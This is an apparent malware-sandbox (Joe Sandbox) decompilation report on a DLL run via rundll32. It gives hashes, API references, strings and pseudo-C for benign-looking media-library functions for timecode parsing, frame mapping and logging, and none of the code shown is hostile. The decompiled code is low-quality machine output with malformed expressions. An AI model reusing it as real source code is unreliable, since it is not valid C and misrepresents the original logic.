Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_logstrcmp
String ID: %-15s $ %s%-17s $%-12s $%c%c%c%c%c%c%c%c%c%c%c
API String ID: 3828882664-2158144587
Opcode ID: c48dc548631b7f659bb685c49b41025a06e9f8ff27b96d58c12b2f1b24194a37
Instruction ID: 3677ec4a8534b68b16c6bb5c66c61464159a9298d24f20388bbc5c890a847a5f
Opcode Fuzzy Hash: c48dc548631b7f659bb685c49b41025a06e9f8ff27b96d58c12b2f1b24194a37
Instruction Fuzzy Hash: 0F9128B5A197018FC714CF28D88065EBBE2EFC8754F55CA2EF89987395D378D8448B82

Uniqueness

Uniqueness Score: -1.00%

Function 1004C151 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 182COMMON

Download Yara Rule

APIs

mv_log.MAIN ref: 1004C2A7
mv_log.MAIN ref: 1004C320
mv_log.MAIN ref: 1004C3E1
mv_log.MAIN ref: 1004C413

Strings

%d:%d:%d%c%d, xrefs: 1004C19B
Valid timecode frame rate must be specified. Minimum value is 1, xrefs: 1004C3FE
Unable to parse timecode, syntax: hh:mm:ss[:;.]ff, xrefs: 1004C3CA
Using non-standard frame rate %d/%d, xrefs: 1004C287
gfff, xrefs: 1004C342
Drop frame is only allowed with multiples of 30000/1001 FPS, xrefs: 1004C30B

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log
String ID: %d:%d:%d%c%d$Drop frame is only allowed with multiples of 30000/1001 FPS$Unable to parse timecode, syntax: hh:mm:ss[:;.]ff$Using non-standard frame rate %d/%d$Valid timecode frame rate must be specified. Minimum value is 1$gfff
API String ID: 2418673259-2042051344
Opcode ID: 376a6e0f90061a24e2ad68bb5ac7123712083f15859e3ba11df8d7ef79b39b28
Instruction ID: 2dccc3d4a2f57473898200d4d9d73c3d244c783664df16274e88938e09edcc61
Opcode Fuzzy Hash: 376a6e0f90061a24e2ad68bb5ac7123712083f15859e3ba11df8d7ef79b39b28
Instruction Fuzzy Hash: 7C6193719087498BC760CF68C580B4EBBE1FB84350F25893FE999DB351D674EE409B86

Uniqueness

Uniqueness Score: -1.00%

Function 1001E2F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E1001E2F0(intOrPtr _a4, char _a8) {
				char _v16;
				intOrPtr _v32;
				intOrPtr _v48;
				char* _v52;
				char _v56;
				void* __ebx;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				char _t46;
				intOrPtr _t49;
				char _t58;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr* _t73;

				_t73 = _t72 - 0x34;
				_t37 = _a4;
				_t58 = _a8;
				_t71 =  *((intOrPtr*)(_t37 + 4));
				_t63 =  *((intOrPtr*)(_t71 + 4));
				_t61 =  *((intOrPtr*)(_t63 + 0xc));
				if( *((intOrPtr*)(_t63 + 0xc)) == 0) {
					_t64 =  *_t63;
					_t62 =  *((intOrPtr*)(_t64 + 0x3c));
					if( *((intOrPtr*)(_t64 + 0x3c)) == 0) {
						_t38 = 0xffffffd8;
						goto L7;
					} else {
						if( *((intOrPtr*)(_t71 + 0x1c)) == 0) {
							_t38 = 0xffffffea;
							goto L7;
						} else {
							 *_t73 = _t37;
							_t39 = L10009FC0(_t58, _t62);
							 *((intOrPtr*)(_t58 + 0x128)) = _t39;
							if(_t39 == 0) {
								goto L6;
							} else {
								_v56 = _t58;
								 *_t73 = _t71;
								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)))) + 0x3c))();
								if(_t42 < 0) {
									_v32 = _t42;
									 *_t73 = _t58 + 0x128;
									E1000A000(_t58 + 0x128, _t71);
									_t38 = _v32;
									goto L7;
								} else {
									 *((intOrPtr*)(_t58 + 0x40)) = _t58;
									return 0;
								}
							}
						}
					}
				} else {
					 *((intOrPtr*)(_t58 + 0x50)) =  *((intOrPtr*)(_t71 + 0x24));
					 *_t73 = _t37;
					_t45 = L10009FC0(_t58, _t61);
					 *((intOrPtr*)(_t58 + 0x128)) = _t45;
					if(_t45 == 0) {
						L6:
						_t38 = 0xfffffff4;
						goto L7;
					} else {
						_t46 = L1001AC40(_t58, _t70, _t71);
						_v16 = _t46;
						if(_t46 == 0) {
							goto L6;
						} else {
							_v56 = _t46;
							_v52 = 0;
							 *_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0xc));
							_t49 = E1001E2F0();
							if(_t49 < 0) {
								L13:
								_v32 = _t49;
								 *_t73 =  &_v16;
								L1001ADB0(_t58);
								return _v32;
							} else {
								 *_t73 = _t58;
								_v52 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0x10));
								_v56 = _v16;
								_t49 = E1001E0B0(_t58, _t70, _t71);
								if(_t49 == 0) {
									goto L13;
								} else {
									_v48 = _t49;
									_v32 = _t49;
									_v56 = 0x10;
									_v52 = "Failed to map frame into derived frame context: %d.\n";
									 *_t73 = _t71;
									L10023A40();
									 *_t73 =  &_v16;
									L1001ADB0("Failed to map frame into derived frame context: %d.\n");
									_t38 = _v32;
									L7:
									return _t38;
								}
							}
						}
					}
				}
			}

0x1001e2f2
0x1001e2f5
0x1001e2f9
0x1001e2fd
0x1001e300
0x1001e303
0x1001e308
0x1001e3c0
0x1001e3c2
0x1001e3c7
0x1001e445
0x00000000
0x1001e3c9
0x1001e3ce
0x1001e43b
0x00000000
0x1001e3d0
0x1001e3d0
0x1001e3d3
0x1001e3d8
0x1001e3e0
0x00000000
0x1001e3e2
0x1001e3e7
0x1001e3eb
0x1001e3ee
0x1001e3f3
0x1001e420
0x1001e42a
0x1001e42d
0x1001e432
0x00000000
0x1001e3f5
0x1001e3f5
0x1001e3ff
0x1001e3ff
0x1001e3f3
0x1001e3e0
0x1001e3ce
0x1001e30e
0x1001e311
0x1001e314
0x1001e317
0x1001e31c
0x1001e324
0x1001e3b0
0x1001e3b0
0x00000000
0x1001e32a
0x1001e32a
0x1001e32f
0x1001e335
0x00000000
0x1001e337
0x1001e337
0x1001e33d
0x1001e347
0x1001e34a
0x1001e351
0x1001e400
0x1001e400
0x1001e408
0x1001e40b
0x1001e419
0x1001e357
0x1001e35d
0x1001e360
0x1001e368
0x1001e36c
0x1001e373
0x00000000
0x1001e379
0x1001e379
0x1001e382
0x1001e38b
0x1001e38f
0x1001e393
0x1001e396
0x1001e39f
0x1001e3a2
0x1001e3a7
0x1001e3b5
0x1001e3ba
0x1001e3ba
0x1001e373
0x1001e351
0x1001e335
0x1001e324

APIs

mv_frame_alloc.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E32A

Part of subcall function 1001AC40: mv_malloc.MAIN ref: 1001AC56

mv_hwframe_get_buffer.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E34A

Part of subcall function 1001E2F0: mv_hwframe_map.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E36C
Part of subcall function 1001E2F0: mv_log.MAIN ref: 1001E396
Part of subcall function 1001E2F0: mv_frame_free.MAIN ref: 1001E3A2

mv_buffer_ref.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E317

Part of subcall function 10009FC0: mv_mallocz.MAIN ref: 10009FD2

mv_buffer_ref.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E3D3

Strings

Failed to map frame into derived frame context: %d., xrefs: 1001E37D

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_ref$mv_frame_allocmv_frame_freemv_hwframe_get_buffermv_hwframe_mapmv_logmv_mallocmv_mallocz
String ID: Failed to map frame into derived frame context: %d.
API String ID: 2770197599-2491951210
Opcode ID: b982bc6816b3afb20851306c66ddb92193a8adb26d1f7859c5dff6e59dc61fb9
Instruction ID: 9b451d42297ff9da348d1ac60a3a70938ed94ec3f991f54ec8aa55de9da18352
Opcode Fuzzy Hash: b982bc6816b3afb20851306c66ddb92193a8adb26d1f7859c5dff6e59dc61fb9
Instruction Fuzzy Hash: 0041F5B46087418FD740DF29D48055FBBE0FF88350F05892DE9A98B345EB34E9818F82

Uniqueness

Uniqueness Score: -1.00%

Function 1002E7A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1002E7B8
strcmp.MSVCRT ref: 1002E7D0
strcmp.MSVCRT ref: 1002E7E8
strcmp.MSVCRT ref: 1002E800
strcmp.MSVCRT ref: 1002E818
strcmp.MSVCRT ref: 1002E830
strcmp.MSVCRT ref: 1002E848
strcmp.MSVCRT ref: 1002E860
mv_parse_ratio.MAIN(?,?,?,?,?,?,?,?,1002BD7B), ref: 1002E88C

Part of subcall function 1002E5D0: mv_expr_parse_and_eval.MAIN ref: 1002E659
Part of subcall function 1002E5D0: mv_d2q.MAIN ref: 1002E675

Strings

ntsc, xrefs: 1002E7A5

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp$mv_d2qmv_expr_parse_and_evalmv_parse_ratio
String ID: ntsc
API String ID: 2874497773-2045543799
Opcode ID: 83ae849ea13b95b91902b7d20c8a5323a228a97e6b021accf889ee30e99a21e1
Instruction ID: f84328928982e3785df4aaf20589b6ac80a434cb6b10c7022aa99fc1399d0474
Opcode Fuzzy Hash: 83ae849ea13b95b91902b7d20c8a5323a228a97e6b021accf889ee30e99a21e1
Instruction Fuzzy Hash: 9031FBB89893819AD750EF29A54161BB6E4EF44380F968C2EA9CCC7340DF74DD40EB53

Uniqueness

Uniqueness Score: -1.00%

Function 1000A720 Relevance: 16.7, APIs: 11, Instructions: 173COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1000A72E
mv_mallocz.MAIN ref: 1000A7D5
ReleaseSRWLockExclusive.KERNEL32 ref: 1000A808
mv_mallocz.MAIN ref: 1000A890
ReleaseSRWLockExclusive.KERNEL32 ref: 1000A8C4

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$Releasemv_mallocz$Acquire
String ID:
API String ID: 2881747546-0
Opcode ID: 0d1f996a099190dbcac24ef498fb0996fadf9c399d392a80c4173242cb49765f
Instruction ID: e8e0c9d1389fe9fc4d2fa8f13575414dd6078b243068f84da3cacd96059e79d8
Opcode Fuzzy Hash: 0d1f996a099190dbcac24ef498fb0996fadf9c399d392a80c4173242cb49765f
Instruction Fuzzy Hash: B36138B49087018FE714DF25C48170BBBE1EF85380F12866DE8998B35ADB74E981CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10023649 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E10023649(void* __edi, signed char* __ebp, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a36, intOrPtr _a40, intOrPtr _a44, char _a48, signed char* _a1072, signed char* _a2096, signed char* _a3120, signed char* _a4144, intOrPtr _a4148, intOrPtr _a4152, signed int _a5204, char* _a5208, char* _a5212) {
				signed int _t63;
				signed int _t67;
				signed int _t70;
				signed int _t73;
				signed int _t76;
				signed int _t81;
				void* _t84;
				signed char* _t85;
				int _t87;
				signed char* _t88;
				intOrPtr _t92;
				signed char* _t93;
				char* _t102;
				signed char* _t103;
				signed char* _t104;
				signed char* _t105;
				signed char* _t106;
				char* _t107;
				char* _t122;
				signed int _t123;
				char* _t125;
				signed char* _t130;
				signed char** _t132;

				_t130 = __ebp;
				if(( *0x100d568c & 0x00000002) != 0) {
					_t51 = _a5204 + 8; // 0x101
					__edx = _t51;
					__eax = 0x100b367b;
					if(__edx <= 0x40) {
						__eax =  *((intOrPtr*)(0x100b3880 + __edx * 4));
					}
					_a8 = __eax;
					__eax = "[%s] ";
					_a4 = "[%s] ";
					 *__esp = __edi;
					__eax = L100089C0();
				}
				 *_t132 = _t130;
				_a8 = _a5212;
				_a4 = _a5208;
				L10008B70();
				_t107 = _a1072;
				_t102 = _a2096;
				_t122 = _a3120;
				_t125 = _a4144;
				if( *_t107 != 0 ||  *_t102 != 0 ||  *_t122 != 0 ||  *_t125 != 0) {
					_t92 = _a4148;
					_t63 = 0;
					if(_t92 != 0 && _a4152 >= _t92) {
						_t63 = (0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000a |  *(_t125 + _t92 - 1) & 0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000d) & 0x000000ff;
					}
					 *0x100aa00c = _t63;
				}
				_a24 = _t125;
				_t93 =  &_a48;
				_a8 = "%s%s%s%s";
				_a20 = _t122;
				_a16 = _t102;
				_a12 = _t107;
				_a4 = 0x400;
				 *_t132 = _t93;
				L10022FC0();
				_t67 =  *0x100d5680;
				if(_t67 == 0) {
					 *_t132 = 2;
					L1009DD30();
					asm("sbb eax, eax");
					 *0x100d5680 = _t67 | 0x00000001;
				}
				_t123 =  *0x100aa00c; // 0x1
				_t126 =  *0x100d5260;
				if(_t123 == 0 || ( *0x100d568c & 0x00000001) == 0) {
					L12:
					if(_t126 > 0) {
						 *_t132 = 2;
						_t123 = 0;
						_t85 =  *0x100aa0cc();
						_a8 = _t126;
						_t126 = "    Last message repeated %d times\n";
						_a4 = "    Last message repeated %d times\n";
						 *_t132 = _t85;
						L10022AF0();
						 *0x100d5260 = 0;
					}
					_a4 = _t93;
					 *_t132 = 0x100d5280;
					strcpy(??, ??);
					_t103 = _a1072;
					_t70 =  *_t103 & 0x000000ff;
					if(_t70 == 0) {
						L20:
						L10022C90(_a40, _t93, _t103, 0, _t123, _t126);
						_t104 = _a2096;
						_t73 =  *_t104 & 0x000000ff;
						if(_t73 == 0) {
							L26:
							L10022C90(_a44, _t93, _t104, 0, _t123, _t126);
							_t105 = _a3120;
							_t76 =  *_t105 & 0x000000ff;
							if(_t76 == 0) {
								L32:
								_t128 = _a36 >> 8;
								_t96 =  >  ? 7 : _a5204 >> 3;
								_t97 =  <  ? 0 :  >  ? 7 : _a5204 >> 3;
								L10022C90( <  ? 0 :  >  ? 7 : _a5204 >> 3,  <  ? 0 :  >  ? 7 : _a5204 >> 3, _t105, _a36 >> 8, _t123, _a36 >> 8);
								_t106 = _a4144;
								_t81 =  *_t106 & 0x000000ff;
								if(_t81 == 0) {
									L38:
									L10022C90(_t97, _t97, _t106, _t128, _t123, _t128);
									goto L39;
								}
								L34:
								while(_t81 - 0xe > 0x11 && _t81 > 7) {
									_t81 = _t106[1] & 0x000000ff;
									_t106 =  &(_t106[1]);
									if(_t81 != 0) {
										continue;
									}
									L37:
									_t106 = _a4144;
									goto L38;
								}
								 *_t106 = 0x3f;
								_t106 =  &(_t106[1]);
								_t81 =  *_t106 & 0x000000ff;
								if(_t81 != 0) {
									goto L34;
								}
								goto L37;
							}
							L28:
							while(_t76 - 0xe > 0x11 && _t76 > 7) {
								_t76 = _t105[1] & 0x000000ff;
								_t105 =  &(_t105[1]);
								if(_t76 != 0) {
									continue;
								}
								L31:
								_t105 = _a3120;
								goto L32;
							}
							 *_t105 = 0x3f;
							_t105 =  &(_t105[1]);
							_t76 =  *_t105 & 0x000000ff;
							if(_t76 != 0) {
								goto L28;
							}
							goto L31;
						}
						L22:
						while(_t73 - 0xe > 0x11 && _t73 > 7) {
							_t73 = _t104[1] & 0x000000ff;
							_t104 =  &(_t104[1]);
							if(_t73 != 0) {
								continue;
							}
							L25:
							_t104 = _a2096;
							goto L26;
						}
						 *_t104 = 0x3f;
						_t104 =  &(_t104[1]);
						_t73 =  *_t104 & 0x000000ff;
						if(_t73 != 0) {
							goto L22;
						}
						goto L25;
					} else {
						L16:
						while(_t70 - 0xe > 0x11 && _t70 > 7) {
							_t70 = _t103[1] & 0x000000ff;
							_t103 =  &(_t103[1]);
							if(_t70 != 0) {
								continue;
							}
							L19:
							_t103 = _a1072;
							goto L20;
						}
						 *_t103 = 0x3f;
						_t103 =  &(_t103[1]);
						_t70 =  *_t103 & 0x000000ff;
						if(_t70 != 0) {
							goto L16;
						}
						goto L19;
					}
				} else {
					 *_t132 = _t93;
					_t106 = 0x100d5280;
					_a4 = 0x100d5280;
					_t87 = strcmp(??, ??);
					if(_t87 != 0) {
						goto L12;
					}
					if(_a48 != 0) {
						 *_t132 = _t93;
						L1009DCB0();
						if( *((char*)(_t132 + _t87 + 0x2f)) == 0xd) {
							goto L12;
						}
						_t128 =  &(_t126[1]);
						 *0x100d5260 = _t128;
						if( *0x100d5680 == 1) {
							 *_t132 = 2;
							_t88 =  *0x100aa0cc();
							_a8 = _t128;
							_a4 = "    Last message repeated %d times\r";
							 *_t132 = _t88;
							L10022AF0();
						}
						L39:
						 *_t132 = _t130;
						_a4 = 0;
						_t84 = E10009690(0, _t106, _t123, _t128);
						 *_t132 = 0x100d5690;
						L1009DE50();
						return _t84;
					}
					goto L12;
				}
			}

0x10023649
0x10023657
0x10023664
0x10023664
0x10023667
0x1002366f
0x1002369e
0x1002369e
0x10023671
0x10023675
0x1002367a
0x1002367e
0x10023681
0x10023681
0x10023274
0x1002327e
0x10023289
0x1002328d
0x10023292
0x10023299
0x100232a0
0x100232a7
0x100232b1
0x100234f0
0x100234f7
0x100234fb
0x10023519
0x10023519
0x1002351c
0x1002351c
0x100232e0
0x100232e4
0x100232ed
0x100232f6
0x100232fa
0x100232fe
0x10023302
0x10023306
0x10023309
0x1002330e
0x10023315
0x10023590
0x10023597
0x1002359f
0x100235a4
0x100235a4
0x1002331b
0x10023321
0x10023329
0x10023360
0x10023362
0x10023364
0x1002336b
0x1002336d
0x10023373
0x10023377
0x1002337c
0x10023380
0x10023383
0x10023388
0x10023388
0x1002338e
0x10023392
0x10023399
0x1002339e
0x100233a5
0x100233aa
0x100233d6
0x100233dc
0x100233e1
0x100233e8
0x100233ed
0x10023416
0x1002341c
0x10023421
0x10023428
0x1002342d
0x10023456
0x10023469
0x1002346e
0x10023477
0x1002347c
0x10023481
0x10023488
0x1002348d
0x100234b6
0x100234ba
0x00000000
0x100234ba
0x00000000
0x10023490
0x100234a6
0x100234aa
0x100234ad
0x00000000
0x00000000
0x100234af
0x100234af
0x00000000
0x100234af
0x10023548
0x1002354b
0x1002354c
0x10023551
0x00000000
0x00000000
0x00000000
0x10023557
0x00000000
0x10023430
0x10023446
0x1002344a
0x1002344d
0x00000000
0x00000000
0x1002344f
0x1002344f
0x00000000
0x1002344f
0x10023530
0x10023533
0x10023534
0x10023539
0x00000000
0x00000000
0x00000000
0x1002353f
0x00000000
0x100233f0
0x10023406
0x1002340a
0x1002340d
0x00000000
0x00000000
0x1002340f
0x1002340f
0x00000000
0x1002340f
0x10023560
0x10023563
0x10023564
0x10023569
0x00000000
0x00000000
0x00000000
0x100233b0
0x00000000
0x100233b0
0x100233c6
0x100233ca
0x100233cd
0x00000000
0x00000000
0x100233cf
0x100233cf
0x00000000
0x100233cf
0x10023578
0x1002357b
0x1002357c
0x10023581
0x00000000
0x00000000
0x00000000
0x10023587
0x10023334
0x10023334
0x10023337
0x1002333c
0x10023340
0x10023347
0x00000000
0x00000000
0x1002334e
0x100236a7
0x100236aa
0x100236b4
0x00000000
0x00000000
0x100236ba
0x100236c2
0x100236c8
0x100236ce
0x100236d5
0x100236e0
0x100236e4
0x100236e8
0x100236eb
0x100236eb
0x100234bf
0x100234bf
0x100234c4
0x100234c8
0x100234cd
0x100234d4
0x100234e6
0x100234e6
0x00000000
0x1002334e

APIs

mv_vbprintf.MAIN ref: 1002328D
strcmp.MSVCRT ref: 10023340
strcpy.MSVCRT ref: 10023399
mv_bprint_finalize.MAIN ref: 100234C8
ReleaseSRWLockExclusive.KERNEL32 ref: 100234D4
mv_bprintf.MAIN ref: 10023681

Strings

[%s] , xrefs: 10023675
Last message repeated %d times, xrefs: 10023377
%s%s%s%s, xrefs: 100232E8

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLockReleasemv_bprint_finalizemv_bprintfmv_vbprintfstrcmpstrcpy
String ID: Last message repeated %d times$%s%s%s%s$[%s]
API String ID: 4275616186-1378087399
Opcode ID: d0df824065387cbc24c48f67f203688572bdbcaedd198ee8c4ff34e36a2db307
Instruction ID: 3a5394bdbcfdd3d39a4a44ba34fc3df736875c3267acf4b9896f0e29f48a5ef2
Opcode Fuzzy Hash: d0df824065387cbc24c48f67f203688572bdbcaedd198ee8c4ff34e36a2db307
Instruction Fuzzy Hash: B161BE749087959FD720DF24D4803AABBE2FF85384F95884EE8C957342C736E985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10009130 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 272
stringCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E10009130() {
				int _t86;
				void* _t91;
				void* _t93;
				signed char _t99;
				void* _t111;
				signed char _t113;
				void* _t114;
				void* _t118;
				signed char _t119;
				void* _t121;
				int _t122;
				void* _t123;
				unsigned int _t124;
				unsigned int _t125;
				signed int _t126;
				void* _t130;
				void* _t131;
				int _t132;
				void* _t136;
				signed char _t139;
				signed char _t141;
				void* _t142;
				void* _t143;
				signed int _t144;
				int _t145;
				void* _t147;
				signed int _t148;
				signed int _t151;
				int _t153;
				signed int _t154;
				void _t158;
				void* _t159;
				char* _t161;
				void** _t162;
				void* _t165;
				void* _t166;
				void** _t167;
				void*** _t168;

				_t86 = _t168[0x111];
				_t167 = _t168[0x110];
				if( *_t86 == 0) {
					L40:
					return _t86;
				} else {
					_t118 = _t167[2];
					while(1) {
						_t145 = _t167[1];
						_t88 =  <=  ? _t145 : _t118;
						_t121 = _t118 - ( <=  ? _t145 : _t118);
						if(_t121 != 0) {
							goto L15;
						}
						 *_t168 = _t168[0x111];
						_t9 = strlen(??) + 1; // 0x1
						_t159 = _t9;
						L11:
						_t124 = _t167[3];
						if(_t124 == _t118 || _t145 >= _t118) {
							L22:
							_t95 =  <=  ? _t118 : _t145;
							_t119 = _t118 - ( <=  ? _t118 : _t145);
							if(_t119 > 0x3ff) {
								L26:
								_t139 = _t119;
								_t147 =  *_t167 + _t145;
								if(_t119 >= 8) {
									if((_t147 & 0x00000001) != 0) {
										 *_t147 = 0x21;
										_t139 = _t119 - 1;
										_t147 = _t147 + 1;
									}
									if((_t147 & 0x00000002) != 0) {
										 *_t147 = 0x2121;
										_t139 = _t139 - 2;
										_t147 = _t147 + 2;
									}
									if((_t147 & 0x00000004) != 0) {
										 *_t147 = 0x21212121;
										_t139 = _t139 - 4;
										_t147 = _t147 + 4;
									}
									_t125 = _t139;
									_t139 = _t139 & 0x00000003;
									_t126 = _t125 >> 2;
									memset(_t147, 0x21212121, _t126 << 2);
									_t168 =  &(_t168[3]);
									_t147 = _t147 + _t126;
									if((_t139 & 0x00000004) == 0) {
										goto L29;
									} else {
										goto L28;
									}
									goto L40;
								} else {
									if((_t139 & 0x00000004) != 0) {
										L28:
										 *_t147 = 0x21212121;
										_t147 = _t147 + 4;
									}
								}
								L29:
								if((_t139 & 0x00000002) != 0) {
									 *_t147 = 0x2121;
									_t147 = _t147 + 2;
								}
								if((_t139 & 0x00000001) != 0) {
									 *_t147 = 0x21;
								}
								_t161 = "[truncated strftime output]";
								_t99 =  <=  ? _t119 : 0x1b;
								_t141 =  *_t167 + _t167[1];
								if(0x1b >= 4) {
									if((_t141 & 0x00000001) != 0) {
										_t141 = _t141 + 1;
										_t161 = "truncated strftime output]";
										_t99 = _t99 - 1;
										 *((char*)(_t141 - 1)) = "[truncated strftime output]" & 0x000000ff;
									}
									if((_t141 & 0x00000002) != 0) {
										_t148 =  *_t161 & 0x0000ffff;
										_t141 = _t141 + 2;
										_t161 =  &(_t161[2]);
										_t99 = _t99 - 2;
